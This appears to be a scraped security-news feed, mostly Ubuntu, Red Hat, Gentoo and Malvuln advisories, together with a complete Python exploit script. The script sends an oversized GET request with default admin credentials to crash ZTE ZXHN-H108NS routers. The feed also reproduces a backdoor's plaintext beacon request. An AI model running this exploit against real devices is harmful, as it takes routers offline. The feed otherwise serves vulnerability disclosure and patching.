Ubuntu Security Notice 5686-3 - USN-5686-1 fixed vulnerabilities in Git. This update provides the corresponding updates for Ubuntu 22.10. Cory Snider discovered that Git incorrectly handled certain symbolic links. An attacker could possibly use this issue to cause an unexpected behaviour.

    ==========================================================================Ubuntu Security Notice USN-5686-3November 21, 2022git vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10Summary:Several security issues were fixed in Git.Software Description:- git: fast, scalable, distributed revision control systemDetails:USN-5686-1 fixed vulnerabilities in Git. This update provides the correspondingupdates for Ubuntu 22.10.Original advisory details: Cory Snider discovered that Git incorrectly handled certain symbolic links. An attacker could possibly use this issue to cause an unexpected behaviour. (CVE-2022-39253) Kevin Backhouse discovered that Git incorrectly handled certain command strings. An attacker could possibly use this issue to arbitrary code execution. (CVE-2022-39260)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  git                             1:2.37.2-1ubuntu1.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5686-3  https://ubuntu.com/security/notices/USN-5686-1  CVE-2022-39253, CVE-2022-39260Package Information:  https://launchpad.net/ubuntu/+source/git/1:2.37.2-1ubuntu1.1

Ubuntu Security Notice USN-5686-3

Red Hat Security Advisory 2022-8545-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.5.0. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:8545-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8545  
Issue date:        2022-11-21  
CVE Names:         CVE-2022-45403 CVE-2022-45404 CVE-2022-45405   
                   CVE-2022-45406 CVE-2022-45408 CVE-2022-45409   
                   CVE-2022-45410 CVE-2022-45411 CVE-2022-45412   
                   CVE-2022-45416 CVE-2022-45418 CVE-2022-45420   
                   CVE-2022-45421   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.5.0.

Security Fix(es):

* Mozilla: Service Workers might have learned size of cross-origin media  
files (CVE-2022-45403)

* Mozilla: Fullscreen notification bypass (CVE-2022-45404)

* Mozilla: Use-after-free in InputStream implementation (CVE-2022-45405)

* Mozilla: Use-after-free of a JavaScript Realm (CVE-2022-45406)

* Mozilla: Fullscreen notification bypass via windowName (CVE-2022-45408)

* Mozilla: Use-after-free in Garbage Collection (CVE-2022-45409)

* Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5  
(CVE-2022-45421)

* Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie  
policy (CVE-2022-45410)

* Mozilla: Cross-Site Tracing was possible via non-standard override  
headers (CVE-2022-45411)

* Mozilla: Symlinks may resolve to partially uninitialized buffers  
(CVE-2022-45412)

* Mozilla: Keystroke Side-Channel Leakage (CVE-2022-45416)

* Mozilla: Custom mouse cursor could have been drawn over browser UI  
(CVE-2022-45418)

* Mozilla: Iframe contents could be rendered outside the iframe  
(CVE-2022-45420)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2143197 - CVE-2022-45403 Mozilla: Service Workers might have learned size of cross-origin media files  
2143198 - CVE-2022-45404 Mozilla: Fullscreen notification bypass  
2143199 - CVE-2022-45405 Mozilla: Use-after-free in InputStream implementation  
2143200 - CVE-2022-45406 Mozilla: Use-after-free of a JavaScript Realm  
2143201 - CVE-2022-45408 Mozilla: Fullscreen notification bypass via windowName  
2143202 - CVE-2022-45409 Mozilla: Use-after-free in Garbage Collection  
2143203 - CVE-2022-45410 Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy  
2143204 - CVE-2022-45411 Mozilla: Cross-Site Tracing was possible via non-standard override headers  
2143205 - CVE-2022-45412 Mozilla: Symlinks may resolve to partially uninitialized buffers  
2143240 - CVE-2022-45416 Mozilla: Keystroke Side-Channel Leakage  
2143241 - CVE-2022-45418 Mozilla: Custom mouse cursor could have been drawn over browser UI  
2143242 - CVE-2022-45420 Mozilla: Iframe contents could be rendered outside the iframe  
2143243 - CVE-2022-45421 Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
thunderbird-102.5.0-2.el8_6.src.rpm

aarch64:  
thunderbird-102.5.0-2.el8_6.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_6.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el8_6.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el8_6.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el8_6.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el8_6.ppc64le.rpm

s390x:  
thunderbird-102.5.0-2.el8_6.s390x.rpm  
thunderbird-debuginfo-102.5.0-2.el8_6.s390x.rpm  
thunderbird-debugsource-102.5.0-2.el8_6.s390x.rpm

x86_64:  
thunderbird-102.5.0-2.el8_6.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_6.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45403  
https://access.redhat.com/security/cve/CVE-2022-45404  
https://access.redhat.com/security/cve/CVE-2022-45405  
https://access.redhat.com/security/cve/CVE-2022-45406  
https://access.redhat.com/security/cve/CVE-2022-45408  
https://access.redhat.com/security/cve/CVE-2022-45409  
https://access.redhat.com/security/cve/CVE-2022-45410  
https://access.redhat.com/security/cve/CVE-2022-45411  
https://access.redhat.com/security/cve/CVE-2022-45412  
https://access.redhat.com/security/cve/CVE-2022-45416  
https://access.redhat.com/security/cve/CVE-2022-45418  
https://access.redhat.com/security/cve/CVE-2022-45420  
https://access.redhat.com/security/cve/CVE-2022-45421  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3t1S9zjgjWX9erEAQjuAg/+MU5G1KTLHnjHWGMhgL2YQHyHLvMASYoQ  
PSXe8qCZsgE0n0v4HRhLdG0idmJWTxKx3zslkqCGx6+md/ghTrTzhyBgzuNmbBrK  
yRJlfOgoSEonEIlLJpWh+nH+17d4aCXq/Uai7I4eKTknYGJ4RuS09p/b9wzJyDHD  
kZakzG4PfIbeAxaKV3cJs+OTfuY58Fvx3/+8gz1rMRiE8fgm+Q/gb2x6pMkpnMEs  
SS//xwoFPnagQF0/pdcjGtKaWaYlam94J++toz5JV4WN1dVuixmPQeimy6fzcuaK  
B8RfNvJaNllEnqHXSKw+sCJx9r4VeO13AoSx2L5pvY7gaGWjUZM7o7fbqfVuCdny  
3WYG5CVVgGWAMdW2w+VmZW/pZamH+EEnYnMe7BAbcSsPaI5Ny82KibaTEoextRig  
lLHLeN2pRi7sDEzgtx9h3QAgfcityk2ePpBZZ6A8ZvO9UNDfCrc4jl97WDfe7zsS  
AuT5tTC6ebwFg1g+fD8Ci8vwW8C+fFUyyzib+dCDQOWC8mQf4+RWLjd56FKOtT/5  
2BVtIXVX4IbXBSdLNebmRNNx9ftrajZxPu/8lpeHyNDBlHY8uLtD+QcS4G3P+vUl  
usr1wgSw2dd0bc32g7JsTuWp0buFs7IY9Nop9h+FyPperIbfYbRirB8Ekndad26J  
A+ICpbo2nTA=  
=LmmD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8545-01

Backdoor.Win32.Oblivion.01.a malware suffers from an insecure transit vulnerability due to sending passwords in the clear over the wire.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/aef85cf0d521eaa6aade11f95ea07ebe.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Oblivion.01.aVulnerability: Insecure Transit Password DisclosureDescription: The malware listens on TCP port 7826 and makes HTTP GET requests to port 80 for "/scripts/WWPMsg.dll". The system logon credentials "Pass=beacytan" are sent plaintext via the URL query string. Third party attackers who can sniff traffic may locate the credentials which can also potentially be leaked to web server logs and or shared systems.Family: OblivionType: PE32MD5: aef85cf0d521eaa6aade11f95ea07ebeVuln ID: MVID-2022-0658Disclosure: 11/18/2022Exploit/PoC:tcpdumpGET /scripts/WWPMsg.dll?from=Oblivion&fromemail=Oblivion@Oblivion.com&subject=User+Online&body=Oblivion+Server+Online!!+[OS=Win]+[ComputerName=DESKTOP-2C4IQJO]+[IP=192.168.18.125]+[Port=7826]+[Pass=beacytan]+[Ver=0.1]&to=121768128 HTTP/1.0" 404 -Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Oblivion.01.a MVID-2022-0658 Insecure Transit

David Bouman discovered that the netfilter subsystem in the Linux kernel did not properly validate passed user register indices. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. David Bouman and Billy Jheng Bing Jhong discovered that a race condition existed in the io_uring subsystem in the Linux kernel, leading to a use- after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Various other issues were also addressed.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 22.04 LTS

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems

Details

David Bouman discovered that the netfilter subsystem in the Linux kernel  
did not properly validate passed user register indices. A local attacker  
could use this to cause a denial of service or possibly execute  
arbitrary code. (CVE-2022-1015)

David Bouman and Billy Jheng Bing Jhong discovered that a race condition  
existed in the io_uring subsystem in the Linux kernel, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-2602)

Sönke Huster discovered that an integer overflow vulnerability existed  
in the WiFi driver stack in the Linux kernel, leading to a buffer  
overflow. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41674)

Sönke Huster discovered that the WiFi driver stack in the Linux kernel did  
not properly perform reference counting in some situations, leading to a  
use-after-free vulnerability. A physically proximate attacker could use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2022-42720)

Sönke Huster discovered that the WiFi driver stack in the Linux kernel did  
not properly handle BSSID/SSID lists in some situations. A physically  
proximate attacker could use this to cause a denial of service (infinite  
loop). (CVE-2022-42721)

Sönke Huster discovered that the WiFi driver stack in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
physically proximate attacker could use this to cause a denial of service  
(system crash). (CVE-2022-42722)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 90.2  
    aws - 90.3  
    azure - 90.2  
    gcp - 90.2  
    gcp - 90.3  
    generic - 90.2  
    gke - 90.2  
    gke - 90.3  
    gkeop - 90.2  
    ibm - 90.2  
    lowlatency - 90.2

Ubuntu 18.04 LTS  
    aws - 90.2  
    azure - 90.2  
    gcp - 90.2  
    generic - 90.2  
    gke - 90.2  
    gkeop - 90.2  
    ibm - 90.2  
    lowlatency - 90.2

Ubuntu 22.04 LTS  
    aws - 90.1  
    aws - 90.2  
    azure - 90.1  
    azure - 90.2  
    gcp - 90.1  
    gcp - 90.2  
    generic - 90.2  
    gke - 90.1  
    gke - 90.2  
    ibm - 90.1  
    ibm - 90.2  
    lowlatency - 90.2

Support Information

Kernels older than the levels listed below do not receive livepatch  
updates. If you are running a kernel version earlier than the one listed  
below, please upgrade your kernel as soon as possible.

Ubuntu 20.04 LTS  
    linux-aws-5.15 - 5.15.0-1000  
    linux-aws - 5.4.0-1009  
    linux-aws - 5.4.0-1061  
    linux-azure-5.15 - 5.15.0-1069  
    linux-azure - 5.4.0-1010  
    linux-gcp-5.15 - 5.15.0-1000  
    linux-gcp - 5.4.0-1009  
    linux-gke-5.15 - 5.15.0-1000  
    linux-gke - 5.4.0-1033  
    linux-gkeop - 5.4.0-1009  
    linux-hwe - 5.15.0-0  
    linux-ibm-5.15 - 5.15.0-1000  
    linux-ibm - 5.4.0-1009  
    linux-oem - 5.4.0-26  
    linux - 5.4.0-26

Ubuntu 18.04 LTS  
    linux-aws-5.4 - 5.4.0-1069  
    linux-aws - 4.15.0-1054  
    linux-aws - 4.15.0-1119  
    linux-azure-4.15 - 4.15.0-1115  
    linux-azure-5.4 - 5.4.0-1069  
    linux-gcp-4.15 - 4.15.0-1121  
    linux-gcp-5.4 - 5.4.0-1069  
    linux-gke-4.15 - 4.15.0-1076  
    linux-gke-5.4 - 5.4.0-1009  
    linux-gkeop-5.4 - 5.4.0-1007  
    linux-hwe-5.4 - 5.4.0-26  
    linux-ibm-5.4 - 5.4.0-1009  
    linux-oem - 4.15.0-1063  
    linux - 4.15.0-69

Ubuntu 16.04 ESM  
    linux-aws-hwe - 4.15.0-1126  
    linux-aws - 4.4.0-1098  
    linux-aws - 4.4.0-1129  
    linux-azure - 4.15.0-1063  
    linux-azure - 4.15.0-1078  
    linux-azure - 4.15.0-1114  
    linux-gcp - 4.15.0-1118  
    linux-hwe - 4.15.0-143  
    linux-hwe - 4.15.0-69  
    linux - 4.4.0-168  
    linux - 4.4.0-211

Ubuntu 22.04 LTS  
    linux-aws - 5.15.0-1000  
    linux-azure - 5.15.0-1000  
    linux-gcp - 5.15.0-1000  
    linux-gke - 5.15.0-1000  
    linux-ibm - 5.15.0-1000  
    linux - 5.15.0-24  
    linux - 5.15.0-25

Ubuntu 14.04 ESM  
    linux-lts-xenial - 4.4.0-168

References

-   CVE-2022-1015  
-   CVE-2022-2602  
-   CVE-2022-41674  
-   CVE-2022-42720  
-   CVE-2022-42721  
-   CVE-2022-42722

Kernel Live Patch Security Notice LSN-0090-1

Gentoo Linux Security Advisory 202211-4 - Multiple vulnerabilities have been found in PostgreSQL, the worst of which could result in remote code execution. Versions greater than or equal to 10.22:10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                          https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: High  
   Title: PostgreSQL: Multiple Vulnerabilities  
    Date: November 19, 2022  
    Bugs: #793734, #808984, #823125, #865255  
      ID: 202211-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in PostgreSQL, the worst of  
which could result in remote code execution.

Background  
==========

PostgreSQL is an open source object-relational database management  
system.

Affected packages  
=================

-------------------------------------------------------------------  
Package              /     Vulnerable     /            Unaffected  
-------------------------------------------------------------------  
dev-db/postgresql    < 10.22                >= 10.22:10  
                                 < 11.17:11           >= 11.17:11  
                                 < 12.12:12           >= 12.12:12  
                                 < 13.8:13             >= 13.8:13  
                                 < 14.5:14             >= 14.5

Description  
===========

Multiple vulnerabilities have been discovered in PostgreSQL. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All PostgreSQL 10.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-10.22:10"

All PostgreSQL 11.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-11.17:11"

All PostgreSQL 12.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-12.12:12"

All PostgreSQL 13.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-13.8:13"

All PostgreSQL 14.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-14.5:14"

References  
==========

[ 1 ] CVE-2021-3677  
     https://nvd.nist.gov/vuln/detail/CVE-2021-3677  
[ 2 ] CVE-2021-23214  
     https://nvd.nist.gov/vuln/detail/CVE-2021-23214  
[ 3 ] CVE-2021-23222  
     https://nvd.nist.gov/vuln/detail/CVE-2021-23222  
[ 4 ] CVE-2021-32027  
     https://nvd.nist.gov/vuln/detail/CVE-2021-32027  
[ 5 ] CVE-2021-32028  
     https://nvd.nist.gov/vuln/detail/CVE-2021-32028  
[ 6 ] CVE-2022-1552  
     https://nvd.nist.gov/vuln/detail/CVE-2022-1552  
[ 7 ] CVE-2022-2625  
     https://nvd.nist.gov/vuln/detail/CVE-2022-2625

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

https://security.gentoo.org/glsa/202211-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202211-04

ZTE ZXHN-H108NS router with firmware version H108NSV1.0.7u_ZRD_GR2_A68 remote stack buffer overflow exploit that causes a denial of service condition.

    # Exploit Title: Router ZTE-H108NS - Stack Buffer Overflow (DoS)# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/# Firmware: H108NSV1.0.7u_ZRD_GR2_A68# Usage: python zte-exploit.py <victim-ip> <port># CVE: N/A # Tested on: Debian 5.18.5#!/usr/bin/python3import sysimport socketfrom time import sleephost = sys.argv[1]  # Recieve IP from userport = int(sys.argv[2])  # Recieve Port from userjunk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"* 5buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1"+ junk + b"&TestBtn=START HTTP/1.1\r\n"buffer += b"Host: 192.168.1.1\r\n"buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0)Gecko/20100101 Firefox/91.0\r\n"buffer += b"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"buffer += b"Accept-Language: en-US,en;q=0.5\r\n"buffer += b"Accept-Encoding: gzip, deflate\r\n"buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"buffer += b"Connection: Keep-Alive\r\n"buffer += b"Cookie:SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2;_TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"print("[*] Sending evil payload...")s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((host, port))s.send(buffer)sleep(1)s.close()print("[+] Crashing boom boom ~ check if target is down ;)")

ZTE ZXHN-H108NS Stack Buffer Overflow / Denial Of Service

Ubuntu Security Notice 5728-2 - Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the memory address space accounting implementation in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5728-2  
November 18, 2022

linux-azure-fde, linux-gke, linux-gkeop, linux-raspi-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems  
- linux-gke: Linux kernel for Google Container Engine (GKE) systems  
- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems  
- linux-raspi-5.4: Linux kernel for Raspberry Pi systems

Details:

Jann Horn discovered that the Linux kernel did not properly track memory  
allocations for anonymous VMA mappings in some situations, leading to  
potential data structure reuse. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-42703)

It was discovered that a race condition existed in the memory address space  
accounting implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-41222)

It was discovered that a race condition existed in the instruction emulator  
of the Linux kernel on Arm 64-bit systems. A local attacker could use this  
to cause a denial of service (system crash). (CVE-2022-20422)

It was discovered that the KVM implementation in the Linux kernel did not  
properly handle virtual CPUs without APICs in certain situations. A local  
attacker could possibly use this to cause a denial of service (host system  
crash). (CVE-2022-2153)

Hao Sun and Jiacheng Xu discovered that the NILFS file system  
implementation in the Linux kernel contained a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-2978)

Johannes Wikner and Kaveh Razavi discovered that for some Intel x86-64  
processors, the Linux kernel's protections against speculative branch  
target injection attacks were insufficient in some circumstances. A local  
attacker could possibly use this to expose sensitive information.  
(CVE-2022-29901)

Abhishek Shah discovered a race condition in the PF_KEYv2 implementation in  
the Linux kernel. A local attacker could use this to cause a denial of  
service (system crash) or possibly expose sensitive information (kernel  
memory). (CVE-2022-3028)

It was discovered that the Netlink device interface implementation in the  
Linux kernel did not properly handle certain error conditions, leading to a  
use-after-free vulnerability with some network device drivers. A local  
attacker with admin access to the network device could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-3625)

It was discovered that the IDT 77252 ATM PCI device driver in the Linux  
kernel did not properly remove any pending timers during device exit,  
resulting in a use-after-free vulnerability. A local attacker could  
possibly use this to cause a denial of service (system crash) or execute  
arbitrary code. (CVE-2022-3635)

Jann Horn discovered a race condition existed in the Linux kernel when  
unmapping VMAs in certain situations, resulting in possible use-after-free  
vulnerabilities. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2022-39188)

Xingyuan Mo and Gengjia Chen discovered that the Promise SuperTrak EX  
storage controller driver in the Linux kernel did not properly handle  
certain structures. A local attacker could potentially use this to expose  
sensitive information (kernel memory). (CVE-2022-40768)

Sönke Huster discovered that a use-after-free vulnerability existed in the  
WiFi driver stack in the Linux kernel. A physically proximate attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2022-42719)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
  linux-image-5.4.0-1057-gkeop    5.4.0-1057.61  
  linux-image-5.4.0-1087-gke      5.4.0-1087.94  
  linux-image-5.4.0-1095-azure-fde  5.4.0-1095.101+cvm1.1  
  linux-image-azure-fde           5.4.0.1095.101+cvm1.33  
  linux-image-gke                 5.4.0.1087.94  
  linux-image-gke-5.4             5.4.0.1087.94  
  linux-image-gkeop               5.4.0.1057.57  
  linux-image-gkeop-5.4           5.4.0.1057.57

Ubuntu 18.04 LTS:  
  linux-image-5.4.0-1074-raspi    5.4.0-1074.85~18.04.1  
  linux-image-raspi-hwe-18.04     5.4.0.1074.73

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
  https://ubuntu.com/security/notices/USN-5728-2  
  https://ubuntu.com/security/notices/USN-5728-1  
  CVE-2022-20422, CVE-2022-2153, CVE-2022-2978, CVE-2022-29901,  
  CVE-2022-3028, CVE-2022-3625, CVE-2022-3635, CVE-2022-39188,  
  CVE-2022-40768, CVE-2022-41222, CVE-2022-42703, CVE-2022-42719

Package Information:  
  https://launchpad.net/ubuntu/+source/linux-azure-fde/5.4.0-1095.101+cvm1.1  
  https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1087.94  
  https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1057.61  
  https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1074.85~18.04.1

Ubuntu Security Notice USN-5728-2

Red Hat Security Advisory 2022-8547-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.5.0. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:8547-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8547  
Issue date:        2022-11-21  
CVE Names:         CVE-2022-45403 CVE-2022-45404 CVE-2022-45405   
                   CVE-2022-45406 CVE-2022-45408 CVE-2022-45409   
                   CVE-2022-45410 CVE-2022-45411 CVE-2022-45412   
                   CVE-2022-45416 CVE-2022-45418 CVE-2022-45420   
                   CVE-2022-45421   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.5.0.

Security Fix(es):

* Mozilla: Service Workers might have learned size of cross-origin media  
files (CVE-2022-45403)

* Mozilla: Fullscreen notification bypass (CVE-2022-45404)

* Mozilla: Use-after-free in InputStream implementation (CVE-2022-45405)

* Mozilla: Use-after-free of a JavaScript Realm (CVE-2022-45406)

* Mozilla: Fullscreen notification bypass via windowName (CVE-2022-45408)

* Mozilla: Use-after-free in Garbage Collection (CVE-2022-45409)

* Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5  
(CVE-2022-45421)

* Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie  
policy (CVE-2022-45410)

* Mozilla: Cross-Site Tracing was possible via non-standard override  
headers (CVE-2022-45411)

* Mozilla: Symlinks may resolve to partially uninitialized buffers  
(CVE-2022-45412)

* Mozilla: Keystroke Side-Channel Leakage (CVE-2022-45416)

* Mozilla: Custom mouse cursor could have been drawn over browser UI  
(CVE-2022-45418)

* Mozilla: Iframe contents could be rendered outside the iframe  
(CVE-2022-45420)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2143197 - CVE-2022-45403 Mozilla: Service Workers might have learned size of cross-origin media files  
2143198 - CVE-2022-45404 Mozilla: Fullscreen notification bypass  
2143199 - CVE-2022-45405 Mozilla: Use-after-free in InputStream implementation  
2143200 - CVE-2022-45406 Mozilla: Use-after-free of a JavaScript Realm  
2143201 - CVE-2022-45408 Mozilla: Fullscreen notification bypass via windowName  
2143202 - CVE-2022-45409 Mozilla: Use-after-free in Garbage Collection  
2143203 - CVE-2022-45410 Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy  
2143204 - CVE-2022-45411 Mozilla: Cross-Site Tracing was possible via non-standard override headers  
